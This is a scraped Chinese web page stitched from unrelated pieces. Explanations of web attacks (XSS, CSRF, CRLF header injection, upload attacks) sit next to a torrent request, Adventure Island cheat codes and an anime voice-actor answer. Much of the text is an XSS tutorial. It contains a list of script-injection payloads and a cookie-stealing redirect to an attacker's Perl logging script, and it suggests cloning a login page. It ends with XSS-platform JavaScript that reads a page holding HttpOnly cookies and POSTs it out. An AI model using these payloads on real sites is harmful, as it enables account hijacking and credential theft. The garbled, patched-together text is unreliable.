xss0061_02_00（s00007280+02）

网站受到了XSS攻击，有什么办法？

一.跨站脚本攻击(XSS)

  跨站脚本攻击（XSS，Cross-site scripting）是最常见和基本的攻击WEB网站的 *** 。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时，特定的脚本就会以浏览者用 户的身份和权限来执行。通过XSS可以比较容易地修改用户数据、窃取用户信息，以及造成其它类型的攻击，例如CSRF攻击

   常见解决办法:确保输出到HTML页面的数据以HTML的方式被转义

    出错的页面的漏洞也可能造成XSS攻击.比如页面/gift/giftList.htm?page=2找不到,出错页面直接把该url原样输出,如果攻击者在url后面加上攻击代码发给受害者,就有可能出现XSS攻击

二. 跨站请求伪造攻击（CSRF)

   跨站请求伪造（CSRF，Cross-site request forgery）是另一种常见的攻击。攻击者通过各种 *** 伪造一个请求，模仿用户提交表单的行为，从而达到修改用户的数据，或者执行特定任务的目的。为了 假冒用户的身份，CSRF攻击常常和XSS攻击配合起来做，但也可以通过其它手段，例如诱使用户点击一个包含攻击的链接

  解决的思路有:

    1.采用POST请求,增加攻击的难度.用户点击一个链接就可以发起GET类型的请求。而POST请求相对比较难，攻击者往往需要借助javascript才能实现

    2.对请求进行认证，确保该请求确实是用户本人填写表单并提交的，而不是第三者伪造的.具体可以在会话中增加token,确保看到信息和提交信息的是同一个人

三.Http Heads攻击

 凡是用浏览器查看任何WEB网站，无论你的WEB网站采用何种技术和框架，都用到了HTTP协议.HTTP协议在Response header和content之间，有一个空行，即两组CRLF（0x0D 0A）字符。这个空行标志着headers的结束和content的开始。“聪明”的攻击者可以利用这一点。只要攻击者有办法将任意字符“注入”到 headers中，这种攻击就可以发生

 以登陆为例:有这样一个url:

当登录成功以后，需要重定向回page参数所指定的页面。下面是重定向发生时的response headers.

HTTP/1.1 302 Moved Temporarily

Date: Tue, 17 Aug 2010 20:00:29 GMT

Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Location:

假如把URL修改一下，变成这个样子：

那么重定向发生时的reponse会变成下面的样子：

HTTP/1.1 302 Moved Temporarily

Date: Tue, 17 Aug 2010 20:00:29 GMT

Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Location: ;CRLF

CRLF

scriptalert('hello')/script

    这个页面可能会意外地执行隐藏在URL中的javascript。类似的情况不仅发生在重定向（Location header）上，也有可能发生在其它headers中，如Set-Cookie header。这种攻击如果成功的话，可以做很多事，例如：执行脚本、设置额外的cookie（CRLFSet-Cookie: evil=value）等。

   避免这种攻击的 *** ，就是过滤所有的response headers，除去header中出现的非法字符，尤其是CRLF。

    服务器一般会限制request headers的大小。例如Apache server默认限制request header为8K。如果超过8K，Aapche Server将会返回400 Bad Request响应：

    对于大多数情况，8K是足够大的。假设应用程序把用户输入的某内容保存在cookie中,就有可能超过8K.攻击者把超过8k的header链接发给受害 者,就会被服务器拒绝访问.解决办法就是检查cookie的大小,限制新cookie的总大写，减少因header过大而产生的拒绝访问攻击

四.Cookie攻击

    通过Java Script非常容易访问到当前网站的cookie。你可以打开任何网站，然后在浏览器地址栏中输 入：javascript:alert(doucment.cookie),立刻就可以看到当前站点的cookie（如果有的话）。攻击者可以利用这个特 性来取得你的关键信息。例如，和XSS攻击相配合，攻击者在你的浏览器上执行特定的Java Script脚本，取得你的cookie。假设这个网站仅依赖cookie来验证用户身份，那么攻击者就可以假冒你的身份来做一些事情。

    现在多数浏览器都支持在cookie上打上HttpOnly的标记,凡有这个标志的cookie就无法通过Java Script来取得,如果能在关键cookie上打上这个标记，就会大大增强cookie的安全性

五.重定向攻击

  一种常用的攻击手段是“钓鱼”。钓鱼攻击者，通常会发送给受害者一个合法链接，当链接被点击时，用户被导向一个似是而非的非法网站，从而达到骗取用户信 任、窃取用户资料的目的。为防止这种行为,我们必须对所有的重定向操作进行审核,以避免重定向到一个危险的地方.常见解决方案是白名单,将合法的要重定向 的url加到白名单中,非白名单上的域名重定向时拒之,第二种解决方案是重定向token,在合法的url上加上token,重定向时进行验证.

六.上传文件攻击

  1.文件名攻击,上传的文件采用上传之前的文件名,可能造成:客户端和服务端字符码不兼容,导致文件名乱码问题;文件名包含脚本,从而造成攻击.

   2.文件后缀攻击.上传的文件的后缀可能是exe可执行程序,js脚本等文件,这些程序可能被执行于受害者的客户端,甚至可能执行于服务器上.因此我们必须过滤文件名后缀,排除那些不被许可的文件名后缀.

  3.文件内容攻击.IE6有一个很严重的问题 , 它不信任服务器所发送的content type，而是自动根据文件内容来识别文件的类型，并根据所识别的类型来显示或执行文件.如果上传一个gif文件,在文件末尾放一段js攻击脚本,就有可 能被执行.这种攻击,它的文件名和content type看起来都是合法的gif图片,然而其内容却包含脚本,这样的攻击无法用文件名过滤来排除，而是必须扫描其文件内容，才能识别。

求好心人给HTCdesireHD@之一會所@xss0032_03_00种子下载有木有

HTCdesireHD@之一會所@xss0032_03_00种子下载地址： 别拿了资源不给分啊

希望采纳

求高桥名人1 2 3 4金手指代码。 1 2 3 4要分开分别说。

; 冒险岛1

#1 0076-01-0A 时间

#1 003F-01-09 生命

#1 006D-01-02 00没武器01斧头02火

#1 0075-01-01 无敌 0061-01-01(滑板车)

——————————————————————

; 冒险岛2

#1 007C-11-30 路上直接用龙：火龙30 冰龙20 水龙50 飞龙40【需按下或点下金手指开启键】

#1 07C8-01-09 喷火龙

#1 07C9-01-09 雪地龙

#1 07CA-01-09 飞龙

#1 07CB-01-09 水龙

#1 07CC-01-09 斧头

#1 07C6-01-FF 无敌

#1 07D3-01-10 时间不减

#1 07D2-01-09 生命

#1 00E5-01-05 蜜蜂效果

____________________________________________

; 冒险岛3

#0 007C-11-21 （00陆地 01水中效果 11带滑板 21带水龙 31火龙……）

#1 0390-01-0F 时间

#1 0394-01-09 生命

#1 038D-01-02 01斧头 02回旋镖

#1 0081-01-01 无敌（钻石效果）

#1 0380-04-99999999 龙和道具无限

#1 0384-04-99999999 龙和道具无限

————————————————————————————————

; 冒险岛4

#1 0056-01-02 无敌

#1 0085-02-2020 血不减

#1 009A-11-03 01火龙 02闪电龙 03飞龙 04水龙 05三角龙【需按下或点下金手指开启键】

#1 009C-04-E0FCFFF0 所有道具。(076F-01-02五角星效果)

#0 00F5-11-01 01陆地上效果;02水中效果空中游泳【需按下或点下金手指开启键】

html跨站语法问题

跨站脚本之完全总结

以前看过分析家写过一篇文章，介绍跨站脚本的安全隐患，当时只是知道有这样的问题，也没有仔细阅读，目前此类问题经常在一些安全站点发布，偶刚好看到这样一篇文章，抱着知道总比不知道好的想法，翻译整理了一下，错误之处请多多指点。

什么是跨站脚本(CSS/XSS)?

我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据，用户认为该页面是可信赖的，但是当浏览器下载该页面，嵌入其中的脚本将被解释执行，

有时候跨站脚本被称为"XSS"，这是因为"CSS"一般被称为分层样式表，这很容易让人困惑，如果你听某人提到CSS或者XSS安全漏洞，通常指得是跨站脚本。

XSS和脚本注射的区别？

原文里作者是和他一个朋友(b0iler)讨论后，才明白并非任何可利用脚本插入实现攻击的漏洞都被称为XSS，还有另一种攻击方式："Script Injection",他们的区别在以下两点：

1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如

:sql injection,XPath injection.

2.跨站脚本是临时的，执行后就消失了

什么类型的脚本可以 *** 入远程页面？

主流脚本包括以下几种：

HTML

JavaScript (本文讨论)

VBScript

ActiveX

Flash

是什么原因导致一个站点存在XSS的安全漏洞？

许多cgi/php脚本执行时，如果它发现客户提交的请求页面并不存在或其他类型的错误时，出错信息会被打印到一个html文件，并将该错误页面发送给访问者。

例如： 404 - yourfile.html Not Found!

我们一般对这样的信息不会注意，但是现在要研究CSS漏洞的成因，我们还是仔细看一下。

例：

该URL指向的连接是有效的，但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html，一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。考虑一下它是如何把我们的输入写到html文件里的？

OK，现在是我们检查XSS漏洞的时候了！

注意：下面仅仅是一个例子，该页面存在XSS漏洞，我们可以插入一写javascript代码到页面里。当然 *** 很多

;scriptalert

('XSS_Vuln_Testing')/script

当我们提交这个URL的时候，在我们的浏览器中弹出一个消息框，"XSS_Vuln_Testing"?

这个例子只是一个XSS漏洞的简单演示，并无实际意义，但足以说明问题所在。

下面我们分析一下造成该运行结果的原因，program.cgi对我们的输入没有经过有效过滤处理，就直接写入404 error页面中，结果创建了一个页面，如下：

html

b404/b - scriptalert('XSS_Vuln_Testing')/script Not Found!

/html

其中的javascript脚本通过浏览器解释执行，然后就出现了你所看到的结果。

如何利用XSS来完成hacking？

如同前面所提到，如果用户提交的请求不能得到满足，那么服务器端脚本会把输入信息写入一个html文件，当服务器端程序对写入html文件的数据没有进行有效过滤，恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。

事例：

假设你发现myemailserver.tld有CSS漏洞，你想要获得其中一个人的email帐号，比如我们的目标是b00b这个人。

把上面存在CSS漏洞的连接修改一下：

这会创建了一个错误页面，我们得到如下信息：

Invalid Input! [article=hax0red]

当插入下面这样的javascript代码时，你的屏幕上会弹出一个包含test的消息框。

;scriptalert('test')

/script

script并没有打印到屏幕上，它是隐藏在背后执行，由于服务器端程序并没有对

scriptalert('test')/script进行有效过滤，所以在页面发回到浏览器并执行了该脚本。

下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱，首先你必须知道b00b的email地址，并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接，嘿嘿，当然它的用意就是从b00b机器中cookie信息里获得自己想要的东东。想办法让b00b访问myemailserver.tld站点发表的文章，比如说："亲爱的b00b,看看这个美

女如何呀？"

那么当可怜的b00b访问 ;script偷取

并保存cookie的脚本

/script

连接时，发生什么事情？cookie都有了，你该知道怎么办了吧！

如果在你目前不是这样的情形，你可以拷贝email服务器的登陆页面，挂到其他的系统上，然后引导用户登陆你的恶意系统页面这样用户信息你可以记录下来，然后再把记录的信息发送回真正的email服务器页面，那些笨蛋并不会意识到实际发生的事情。

把javascript脚本插入WEB页面的不同 *** ：

snip

拷贝自：GOBBLES SECURITY ADVISORY #33

Here is a cut-n-paste collection of typical JavaScript-injection hacks

you may derive some glee from playing with.

a href="javascript#[code]"

div onmouseover="[code]"

img src="javascript:[code]"

img dynsrc="javascript:[code]" [IE]

input type="image" dynsrc="javascript:[code]" [IE]

bgsound src="javascript:[code]" [IE]

script[code]/script

{[code]}; [N4]

img src={[code]}; [N4]

link rel="stylesheet" href="javascript:[code]"

iframe src="vbscript:[code]" [IE]

img src="mocha:[code]" [N4]

img src="livescript:[code]" [N4]

a href="about:script[code]/script"

meta http-equiv="refresh" content="0;url=javascript:[code]"

body onload="[code]"

div style="background-image: url(javascript:[code]);"

div style="behaviour: url([link to code]);" [IE]

div style="binding: url([link to code]);" [Mozilla]

div style="width: expression([code]);" [IE]

style type="text/javascript"[code]/style [N4]

object classid="clsid:..." codebase="javascript:[code]" [IE]

style!--/stylescript[code]//--/script

![CDATA[!--]]script[code]//--/script

!-- -- --script[code]/script!-- -- --

script[code]/script

img src="blah"onmouseover="[code]"

img src="blah" onmouseover="[code]"

xml src="javascript:[code]"

xml id="X"abscript[code]/script;/b/a/xml

div datafld="b" dataformatas="html" datasrc="#X"/div

[\xC0][\xBC]script[code][\xC0][\xBC]/script [UTF-8; IE, Opera]

----Copied from GOBBLES SECURITY ADVISORY #33----

/snip

一个真正的获取cookie并且做记录的例子：

注意：要使它工作，你的浏览器必须允许接受站点发送的cookies，

当我测试下面的信息时，使用

javascript创建访问者的cookies，javascript脚本放在index.html文件中。

OK，下面假设存在XSS攻击的安全隐患，存在漏洞的连接是：

;evil javascript

我们创建这样一个连接：

;script

document.location='

.tld

/cgi-bin/evil_cookie_logger.cgi?'+document.cookie/script

然后让保存该站点cookie的用户访问这个连接：

这是我们的CGI脚本，它的作用就是对用户cookie做记录：

---------evil_cookie_logger.cgi-----------

#!/usr/bin/perl

# evil_cookie_logger.cgi

# remote cookie logging CGI coded by BrainRawt

#

# NOTE: coded as a proof of concept script when testing for

# cross-site scripting vulnerabilities.

$borrowed_info = $ENV{'QUERY_STRING'};

$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, "evil_cookie_log") or print "Content-type:

text/html\n\n something went wrong\n";

print EVIL_COOKIE_LOG "$borrowed_info\n";

print "Content-type: text/html\n\n";

close(EVIL_COOKIE_LOG);

------------------------------------------

该脚本首先通过 $ENV{'QUERY_STRING'}获得cookie，打印到$borrowed_info变量里，通过open(EVIL_COOKIE_LOG, "evil_cookie_log")，把cookie信息保存到evil_cookie_log文件。

注意：上面的javascript脚本，可能在一些浏览器或者站点上不能执行，

这仅仅是我在自己的站点上做测试用的。

如何防范XSS攻击？

1.在你的WEB浏览器上禁用javascript脚本

2..开发者要仔细审核代码，对提交输入数据进行有效检查，如""和""。

可以把""，""转换为，

注意：由于XSS漏洞可被利用的多样性，程序员自己要明白具体需要过滤的字符，

这主要依赖于所开发程序的作用，建议过滤掉所有元字符，包括"="。

对受害者来说不要访问包含script字符的连接，一些官方的URL不会包括任何脚本元素。

狐仆xss的男主角配音是谁

中村悠一

楼上的错了哦。。。御狐神是中村悠一cv

中村悠一，日本著名男性声优。代表作品：《冰菓》折木奉太郎、《王牌投手振臂高挥》阿部隆也、《妖狐×仆SS》御狐神双炽、《CLANNAD》系列冈崎朋也、《月刊少女野崎同学》野崎梅太郎、《机动战士高达00》格拉汉姆·艾卡、《妖精的尾巴》格雷·佛尔帕斯塔、《罪恶王冠》恙神涯、《守护甜心》月咏几斗、《钢之炼金术师FA》古利德、《Starry☆Sky》不知火一树、《我的妹妹哪有这么可爱！》高坂京介、《MACROSS

F》早乙女阿尔特、《最强银河究极ZERO战斗之魂》一番星之零等。

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头，其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段，同时该字段是受http-only保护的，百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样，我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码，且 的 Access-Control-Allow-Origin 为空，即默认不允许跨域，所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到， 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script